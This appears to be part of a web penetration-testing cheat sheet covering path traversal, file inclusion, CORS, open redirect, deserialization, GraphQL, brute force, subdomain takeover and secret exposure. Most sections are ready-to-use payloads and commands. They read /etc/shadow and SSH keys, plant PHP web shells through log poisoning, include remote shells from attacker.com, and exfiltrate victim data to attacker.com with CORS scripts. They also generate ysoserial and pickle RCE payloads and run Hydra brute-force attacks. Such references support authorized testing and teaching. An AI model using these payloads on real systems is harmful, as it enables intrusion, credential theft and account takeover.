// Basic ../../../etc/passwd ../../etc/passwd ../etc/passwd // URL encoded ..%2F..%2F..%2Fetc%2Fpasswd %2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd %2e%2e/%2e%2e/%2e%2e/etc/passwd // Double URL encoded ..%252F..%252F..%252Fetc%252Fpasswd // Unicode / UTF-8 ..%c0%af..%c0%afetc%c0%afpasswd ..%ef%bc%8f..%ef%bc%8fetc%ef%bc%8fpasswd // Null byte (old PHP) ../../../etc/passwd%00.jpg // Windows ..\..\..\windows\win.ini ..\..\..\..\windows\system32\drivers\etc\hosts %WINDIR%\win.ini // With prefix bypass (if app adds prefix) ....//....//....//etc/passwd ....\/....\/etc/passwd // Absolute path /etc/passwd C:\windows\win.ini
Common Target Files
// Linux /etc/passwd /etc/shadow /etc/hosts /etc/issue /proc/self/environ /proc/self/cmdline /proc/net/tcp /var/log/apache2/access.log (LFI to RCE via log poisoning) /var/log/nginx/access.log ~/.ssh/id_rsa ~/.bash_history /var/www/html/config.php // Windows C:\windows\win.ini C:\boot.ini C:\inetpub\wwwroot\web.config C:\windows\system32\drivers\etc\hosts
Tools
dotdotpwnBurp Suiteffuf
dotdotpwn -m http -h target.com -f /etc/passwd -k "root:"
Impact
  • Read server configuration
  • SSH private key theft
  • Source code disclosure
  • Credential exposure
References
21
LOCAL / REMOTE FILE INCLUSION (LFI / RFI)
Including local or remote files in server-side code execution, often leading to RCE.
Detection
// Look for params like: ?page=home ?file=index ?template=main ?include=header ?lang=en // Test with: ?page=../../../etc/passwd ?file=../../../../etc/hosts
LFI Payloads
// Basic ?page=../../../etc/passwd ?file=../../../../etc/shadow // PHP Wrappers ?page=php://filter/convert.base64-encode/resource=index.php // Read PHP source ?page=php://filter/read=string.rot13/resource=index.php ?page=php://input // with POST: <?php system('id');?> ?page=data://text/plain,<?php system('id');?> ?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCdpZCcpOz8+Cg== ?page=phar://./upload/evil.zip/shell // PHAR deserialization // Null byte bypass (PHP < 5.3) ?page=../../../etc/passwd%00 ?page=../../../etc/passwd%00.php
LFI to RCE
// Log Poisoning - inject PHP code in User-Agent: User-Agent: <?php system($_GET['cmd']); ?> // Then include: ?page=../../../var/log/apache2/access.log&cmd=id // Proc environ injection: ?page=/proc/self/environ // If env vars user-controlled // Session file: ?page=/var/lib/php/sessions/sess_[your_session_id] // Set session var to: <?php system($_GET['cmd']); ?>
RFI Payloads
// requires: allow_url_include=On (PHP) ?page=http://attacker.com/shell.txt ?page=http://attacker.com/shell.php ?page=ftp://attacker.com/shell.txt ?page=//attacker.com/shell.txt (SMB)
Tools
LFISuiteliffyBurp Suiteffuf
Impact
  • Source code disclosure
  • Credential theft
  • RCE via log poisoning
References
22
CORS MISCONFIGURATION
Overly permissive CORS headers allowing malicious sites to read cross-origin responses.
Detection
// Send request with Origin header, check response: Origin: https://attacker.com // Vulnerable response: Access-Control-Allow-Origin: https://attacker.com Access-Control-Allow-Credentials: true // Test origins: Origin: https://attacker.com Origin: null Origin: https://target.com.attacker.com Origin: https://attacker.target.com
Exploitation PoC
// Host on attacker.com: <script> var req = new XMLHttpRequest(); req.onload = function() { // Exfil response data fetch('https://attacker.com/steal?data=' + btoa(this.responseText)); } req.open('GET','https://target.com/api/user',true); req.withCredentials = true; req.send(); </script> // Fetch API PoC <script> fetch('https://target.com/api/profile', {credentials: 'include'}) .then(r => r.text()) .then(data => fetch('https://attacker.com/steal?d='+btoa(data))); </script>
CORS Bypass Techniques
// Origin: null (for sandboxed iframes) <iframe sandbox="allow-scripts allow-top-navigation allow-forms" src="data:text/html,<script>var req=new XMLHttpRequest(); req.open('GET','https://target.com/api/',true); req.withCredentials=true; req.onload=()=>location='https://attacker.com/?d='+req.responseText; req.send();</script>"> </iframe>
Tools
Burp SuiteCORSycors-poc.py
Impact
  • Sensitive data theft from authenticated sessions
  • Account takeover via CSRF-like attacks
References
23
SECURITY MISCONFIGURATION
Exposed admin panels, default credentials, unnecessary services, missing security headers.
Checklist
// 1. Missing Security Headers (check with curl -I): Strict-Transport-Security (HSTS) Content-Security-Policy (CSP) X-Frame-Options X-Content-Type-Options Referrer-Policy Permissions-Policy X-XSS-Protection // 2. Exposed admin interfaces /admin /phpmyadmin /wp-admin /manager (Tomcat) /actuator (Spring Boot - exposes /actuator/env, /actuator/heapdump) /console (JBoss/WebLogic) /.git/ (source code exposure) /.env (environment variables) /swagger-ui.html (API docs exposure) /api-docs /graphql (introspection enabled) // 3. Default credentials admin:admin (phpMyAdmin, routers) tomcat:tomcat (Tomcat manager) admin:password (various) elastic: (Elasticsearch no auth) // 4. Directory listing enabled // Check: response contains "Index of /" // 5. Sensitive files robots.txt (may reveal hidden paths) sitemap.xml crossdomain.xml .htaccess backup.zip / backup.tar.gz /WEB-INF/web.xml /META-INF/
HTTP Security Headers Test
curl -I https://target.com # OR use: securityheaders.com observatory.mozilla.org
Tools
NiktoNmapgobusterffufnuclei
nikto -h https://target.com nuclei -u https://target.com -t misconfiguration/ gobuster dir -u https://target.com -w /usr/share/wordlists/dirb/common.txt
Impact
  • Information disclosure
  • Admin access via defaults
  • Source code theft
  • XSS via missing CSP
References
24
OPEN REDIRECT
Application redirects users to attacker-controlled URLs via unvalidated redirect parameters.
Where to Test
  • ?next=URL
  • ?redirect=URL
  • ?url=URL
  • ?return=URL
  • ?goto=URL
  • ?dest=URL
  • Login callbacks
Payloads
// Basic ?next=https://attacker.com ?redirect=//attacker.com ?url=https://attacker.com // Bypass whitelisting ?url=https://target.com.attacker.com ?url=https://attacker.com?target.com ?url=https://target.com@attacker.com ?url=https://attacker.com/target.com ?url=\/\/attacker.com ?url=%2F%2Fattacker.com ?url=%5C%5Cattacker.com ?url=https:%252F%252Fattacker.com ?url=javascript:alert(1) // for XSS ?url=data:text/html,<script>alert(1)</script> // Protocol-relative (browser resolves to https or http) ?url=//attacker.com // CRLF + redirect ?url=https://attacker.com%0d%0aLocation:https://evil.com
Chaining with Other Attacks
Open Redirect + OAuthUsed to steal OAuth authorization codes via redirect_uri bypass
Open Redirect + SSRFChain with SSRF if server follows redirects
Tools
Burp SuiteOpenRedireX
Impact
  • Phishing attacks
  • OAuth token theft
  • SSRF chaining
References
25
INSECURE DESERIALIZATION
Deserializing attacker-controlled data triggers RCE via gadget chains in known libraries.
Indicators of Serialized Data
// Java: starts with rO0AB... (base64) or 0xACED0005 (hex) // PHP: O:4:"User":1:{s:4:"name";s:5:"admin";} // Python: base64 encoded pickle // .NET: AAEAAAD.../BinaryFormatter // JSON with type information: {"@type":"java.lang.Class"} // ViewState: __VIEWSTATE parameter
PHP Deserialization
// Test with modified object: O:4:"User":2:{s:4:"name";s:5:"admin";s:4:"role";s:5:"admin";} // Magic method abuse: __wakeup, __destruct, __toString // Craft objects that call dangerous functions on deserialization
Java Deserialization
// Use ysoserial to generate gadget chain payloads: java -jar ysoserial.jar CommonsCollections1 "id" | base64 java -jar ysoserial.jar CommonsCollections6 "curl http://attacker.com/$(id)" | base64 java -jar ysoserial.jar Spring1 "id" | base64 // Send as body or cookie where Java objects are consumed
Python Pickle
import pickle, os, base64 class Exploit(object): def __reduce__(self): return (os.system, ('id',)) payload = base64.b64encode(pickle.dumps(Exploit())).decode() # Send as cookie or POST param
.NET ViewState
// If MachineKey is known or default: ysoserial.net -g TypeConfuseDelegate -f LosFormatter -c "cmd /c whoami" | base64
Tools
ysoserialysoserial.netBurp Suitefreddy (Burp ext)
Impact
  • Remote Code Execution
  • Authentication bypass
  • Privilege escalation
References
26
BUSINESS LOGIC FLAWS
Exploiting application logic to perform unintended actions (price manipulation, workflow bypass).
Test Scenarios
// 1. Price Manipulation // Modify price/quantity in POST body before checkout // price=100 → price=-100 (negative price = credit) // quantity=1 → quantity=-1 // Apply coupon multiple times // 2. Workflow Step Bypass // Skip payment step: go directly from cart to /order-confirmed // Replay POST without payment verification // Modify order status in request // 3. Coupon/Promo Abuse // Apply same coupon repeatedly // Apply multiple conflicting discounts // Use expired coupon with modified date // 4. Race Condition // Double-spend by sending concurrent requests // Two simultaneous "withdraw" API calls // Use Burp Repeater → send group in parallel // 5. Limit Bypass // Transfer more than account balance // Integer overflow: quantity=9999999999 (overflow to small number) // Submit form with negative values // 6. Privilege Escalation // Change role=user to role=admin in API call // Modify account_type=premium in request // 7. Two-Factor Auth Skip // Complete first step, directly access post-2FA URL // 8. Mass Assignment // Extra JSON fields in profile update: // {"name":"test","is_admin":true,"credits":9999}
Tools
Burp SuiteManual AnalysisTurbo Intruder (race)
Impact
  • Financial fraud
  • Privilege escalation
  • Data integrity violation
References
27
GRAPHQL INJECTION
Exploiting GraphQL APIs via introspection, injection, and authorization flaws.
Discovery
// Common GraphQL endpoints: /graphql /api/graphql /graphiql /v1/graphql /query
Introspection (Enumerate Schema)
// Full introspection query: {"query": "__schema { queryType { name } types { name fields { name type { name } } } }"} // Simple type listing: {"query": "{__schema{types{name}}}"} // Get all queries: {"query": "{__schema{queryType{fields{name description}}}}"} // Bypass disabled introspection: {"query": "{__schema\n{queryType{name}}}"} // newline bypass {"query": "{ __type(name: \"Query\") { fields { name } } }"} // __type still works
Exploitation Payloads
// IDOR via GraphQL {"query": "{ user(id: 2) { email password } }"} {"query": "{ order(id: 12345) { total address } }"} // Batch query abuse (DoS / auth bypass) [{"query":"{user{id email}}"},{"query":"{user{id email}}"},...] // repeat 100x // Mutation abuse {"query": "mutation { updateUser(id:2, role:\"admin\") { id role } }"} // SQL/NoSQL injection inside GraphQL args {"query": "{ user(name: \"' OR 1=1--\") { email } }"} // Field suggestion abuse - typo reveals real fields {"query": "{ usr { email } }"} // response suggests "user" // Alias batching to bypass rate limit {"query": "{ a:login(user:\"admin\",pass:\"1\") b:login(user:\"admin\",pass:\"2\") }"}
Tools
GraphQL VoyagerInQL (Burp)Altairclairvoyance
References
28
RATE LIMITING / BRUTE FORCE
Absence of rate limiting enables brute-force of credentials, OTPs, and API keys.
Where to Test
  • Login endpoint
  • OTP / 2FA codes
  • Password reset tokens
  • API keys
  • Captcha bypass
Techniques
// 1. Basic brute force - no lockout POST /login → 1000 requests with password list // 2. Rate limit bypass via headers X-Forwarded-For: 1.1.1.1 → rotate IP each request X-Real-IP: 2.2.2.2 X-Originating-IP: 3.3.3.3 CF-Connecting-IP: 4.4.4.4 // 3. Rate limit bypass via null byte in username username=admin%00 // 4. OTP brute force (4-6 digit = 10,000-1,000,000 combinations) // Send rapid requests with codes 0000-9999 // 5. Password spray (avoid lockout) // Try 1 password against all users → rotate // 6. Padding attack on OTP // Change: {"otp":"1234"} to {"otp":["1234","1234",...]} // 7. Race condition on OTP // Submit correct OTP in parallel → bypass single-use limit // 8. Username enumeration via timing
Common Wordlists
// Passwords: rockyou.txt, SecLists/Passwords/Common-Credentials/ 10-million-password-list-top-100.txt // Usernames: SecLists/Usernames/Names/names.txt
Tools
HydraBurp IntruderffufMedusaTurbo Intruder
hydra -L users.txt -P pass.txt http-post-form "//login:user=^USER^&pass=^PASS^:Invalid" ffuf -w passwords.txt -X POST -d "user=admin&pass=FUZZ" -u https://target.com/login -fc 401
Impact
  • Account takeover via credential brute-force
  • OTP/2FA bypass
  • API key enumeration
References
29
SUBDOMAIN TAKEOVER
Claiming dangling DNS records pointing to unclaimed third-party services.
How It Works
Mechanism 1. target.com has: sub.target.com CNAME service.github.io
2. GitHub Pages project deleted / unclaimed
3. Attacker creates GitHub Pages project at service.github.io
4. sub.target.com now serves attacker content
Detection
// Step 1: Enumerate subdomains subfinder -d target.com -o subs.txt amass enum -d target.com -o subs.txt assetfinder target.com // Step 2: Check for dangling CNAME for sub in $(cat subs.txt); do dig $sub CNAME +short done // Step 3: Check if CNAME target is claimable // Error indicators per service: // GitHub Pages: "There isn't a GitHub Pages site here" // Heroku: "No such app" // Fastly: "Fastly error: unknown domain" // Shopify: "Sorry, this shop is currently unavailable" // AWS S3: "NoSuchBucket" // Zendesk: "Help Center Closed"
Vulnerable Service Fingerprints
GitHub Pages: "There isn't a GitHub Pages site here" Heroku: "No such app" AWS S3: "NoSuchBucket" Fastly: "Fastly error: unknown domain" Azure: "404 Web Site not found" Shopify: "Sorry, this shop is currently unavailable" Pantheon: "404 error unknown site" Surge.sh: "project not found" Tumblr: "Whatever you were looking for doesn't currently exist"
Tools
subjacknucleitakeoversubfindersubzy
subjack -w subs.txt -t 100 -timeout 30 -ssl -c ~/fingerprints.json subzy run --targets subs.txt
Impact
  • Cookie theft (same-origin on subdomain)
  • Phishing via trusted subdomain
  • XSS via subdomain
  • Malware hosting
References
30
SENSITIVE DATA EXPOSURE
Unintentional exposure of credentials, keys, PII through misconfiguration or verbose responses.
Where to Look
// Source Code / JS Files // Search for keywords in JS bundles: api_key, apikey, secret, password, token, auth, AWS_ACCESS, PRIVATE_KEY, bearer, passwd, credential // Common files to check: /.env /.git/config /config.php /database.yml /settings.py /application.properties /wp-config.php /web.config /appsettings.json /config/database.yml /package.json (may expose internal module names) // Error messages // Verbose stack traces with DB connection strings // Internal server paths in error messages // API Responses // Returning sensitive fields: SSN, card numbers, passwords (hashed or plain) // Extra fields in JSON not shown in UI // Backup / old files /index.php.bak /config.php~ /admin.php.old /backup.sql // Comment in HTML source <!-- DB: mysql://root:password@localhost/app --> <!-- TODO: remove test API key: sk-prod-abc123 --> // Google Dorks site:target.com filetype:sql site:target.com filetype:log site:target.com "DB_PASSWORD" site:pastebin.com target.com
Tools
truffleHoggitrobgitleaksgospiderLinkFinder
trufflehog git https://github.com/target/repo gitleaks detect --source . --report-path=report.json linkfinder.py -i https://target.com -d # Extract JS endpoints/secrets
Impact
  • Credential/API key theft
  • Database access
  • PII exposure (GDPR violation)
  • Full account/system compromise
References